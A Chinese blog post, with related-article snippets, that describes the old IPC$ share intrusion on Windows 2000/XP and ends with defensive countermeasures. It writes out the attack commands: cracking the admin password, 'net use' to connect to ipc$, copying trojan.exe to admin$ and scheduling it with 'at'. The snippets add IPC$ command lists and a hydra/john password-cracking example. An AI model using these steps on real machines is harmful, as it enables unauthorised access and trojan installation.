入侵

最新推荐文章于 2021-01-23 16:33:50 发布
最新推荐文章于 2021-01-23 16:33:50 发布
阅读量488 收藏 1
点赞数
文章标签: 破解 server 服务器 微软 网络 xp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/imfam520/article/details/2199902
版权

ipc$共享入侵

微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下:

(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。

(2)使用命令net use //xxx.xxx.xxx.xxx/ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe //xxx.xxx.xxx.xxx/admin$ 将木马程序的服务器端复制到系统目录下。

(3)用net time //xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at //202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。

这样一来,你的电脑就完全被黑客控制了。

应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),

当然,给自己的帐户加上强壮的口令才是最关键的。

 

imfam520
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali利用hydra破解Windows2003Server的用户和密码
路~可以走过
06-09 3637
1.Windows2003先设置密码,以管理员运行cmd,输入命令 C:\Users\Administrator>net user administrator * 请键入用户的密码: 请再键入一次密码以便确认: 命令成功完成。 2. Kali使用john创建密码字典 john --wordlist --rules --stdout > m.txt --wordlis...
入侵检测——ipc
LainWith的博客
08-27 1221
目录什么是IPC复现抓包小写ipc特征大写IPC特征响应特征综合规则: 规则不是非常严谨,没有经过实战检验,检测方式仅供参考 什么是IPC IPC,又称ipc$,是windows系统中默认开启的一个共享空连接,用来让远程用户连接测试连接时的账号密码是否正确 在终端中输入net use \\目标IP\ipc$ 密码 /user:用户即可尝试连接目标 ipc$的利用条件: 管理员开启了默认共享 知道受害者的IP和登录密码 开启了139、445端口 常用命令: 工作组:net use \\目标IP\ipc
经验分享 | IPC共享经典入侵
Uguardsec的博客
01-23 882
一、什么是IPC$ IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 二、配置环境 1)在目标主机上设置组策略:开始->运行-〉gpedit.msc 2)计算机配置->windows配置-〉本地策略-〉安全选项 3)在安全选项中,将网络访问:本地账户的共享和安全模式 设置为:经典——本地用户以自己的身份
利用IPC$共享入侵windowsXP实践
心宽体胖之军师
06-09 6996
测试环境:主机(windows XP sp3)与windows XP sp2虚拟机)    通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ 
IPC$局域网入侵详解
热门推荐
帅帅的小窝
02-26 1万+
PC$命令详解  网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
共享入侵的五个步骤/....................
08-30
共享入侵的五个步骤 共享入侵的五个步骤 共享入侵的五个步骤
东软入侵监测用户配置产品手册
最新发布
03-09
东软 NetEye 入侵检测系统 V2.2 用户使用指南 东软 NetEye 入侵检测系统 V2.2 是一款功能强大且灵活的入侵检测系统,旨在帮助用户检测和预防网络攻击。本手册旨在指导用户如何正确地配置和使用东软 NetEye 入侵检测...
基于WiFi信号的入侵检测机理及实验研究
10-15
【WiFi信号入侵检测机理】 在现代科技社会,室内安全的重要性日益凸显,而基于WiFi信号的入侵检测技术为保障安全提供了一种创新方法。传统的入侵检测手段如微波、红外、超声报警器、雷达和视频监控等各有优缺点,但...
萨客嘶入侵检测系统 v1.0
03-13
萨客嘶入侵检测系统是一种积极主动的网络安全防护工具,提供了对内部和外部攻击的实时保护,它通过对网络中所有传输的数据进行智能分析和检测,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象, 在...
网络入侵检测系统IDS安装部署实验指导书.docx
03-18
网络入侵检测系统IDS安装部署实验指导书 本实验指导书旨在引导学生了解入侵检测系统的基本概念和工作原理,并掌握Snort入侵检测系统的安装和使用方法。 一、入侵检测系统简介 入侵检测系统(intrusion detection ...
天融信入侵检测系统用户手册.pdf
08-26
天融信入侵检测系统用户手册提供了详尽的指导,帮助用户理解和操作天融信的TopSentry3000入侵检测系统。该系统是专为监控网络和系统安全而设计的,通过检测和分析网络流量,能及时发现任何可能违反安全策略的行为...
IPC$共享通道的安全
suspension·成长之路·操作系统blog
05-17 2186
IPC$共享通道的安全IPC$共享通道按微软的本意是用来方便网管的,可是自从被黑客利用以后,IPC$入侵就成为最简单的入侵方式。建议大家关闭这个危险的IPC$共享通道。1.在regedit中的HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA中新建一个字串RestrictAnonymous.并把值设为1,这样可以禁止IPC$空连接
Linux进程间通讯(四)共享内存
JT同学的博客
10-21 785
Linux进程间通讯(四)共享内存 文章目录Linux进程间通讯(四)共享内存一、IPC总览三、将共享内存映射到进程虚拟地址空间四、访问共享内存五、总结 一、IPC总览 在内核中,对于共享内存、消息队列、信号量都是使用统一的机制管理起来的,都叫做 ipcxxx 为了维护这三种进程间通讯的机制,内核定义了一个三项的数组,如下 struct ipc_namespace { ...... struct...
IPC$入侵的4种方式
weixin_43456810的博客
12-31 2005
IPC$入侵的4种方式 1. 建立空连接 net use \\192.168.1.111\IPC$ 只要在建立空连接的命令最后添加del,即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.111 3. 查看远程主机的共享资源 net view \\192.168.1.111 4. 得到远程主机的NetBIOS的用户名列表 nbtstat -a 192.168.1.111 禁止IPC$共享 services.msc–>Server–>启动
使用net use 和ipc$的一些常方法
wsp1的专栏
02-04 4427
1.首先打开共享了net use //61.141.xxx.xxx/ipc$如果直截敲回车,这样就隐藏了输入用户名和密码.这样很多默认设置的机器就没有密码了,如果有密码,那么格式是net use //61.141.xxx.xxx/ipc$ "密码" 2.把别人的共享作为自己的网络磁盘。输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名" 3.如果要c
WinXP和Win2003超级管理员密码破解
greenerycn的专栏
02-08 1万+
专门用于破解Windows XP和Windows 2003超级管理密码的好工具:dospass是一个仅为27KB的.exe执行文件。操作很简单如下:      1、光盘或者软盘引导进入DOS环境运行dospass      2、“Your choince:[ ]”-->输入“1”(Logic diver)-->Enter,将列出硬盘分区表,继续按Enter,会提示已检测到磁盘MS SAM Data
局域网共享 和 IPC$ 入侵问题
FISH 的专栏
11-24 3284
禁止ipc$默认共享的方法 以下四种方法可以参考一下: A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止建立空连接  首先运行regedit,找到如下主键[HKEY_LOCAL_MACHIN
一份详尽的IPC$入侵资料
Another's story
07-24 4399
  一 唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
深入理解入侵检测技术及其应用
"本文主要探讨了入侵检测技术的起源、发展、原理以及未来趋势,适合对网络安全感兴趣的读者。文中详细介绍了信息收集、信号分析等关键步骤,并分析了各种检测技术规则,包括基于特征和统计的方法,同时提到了软计算...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值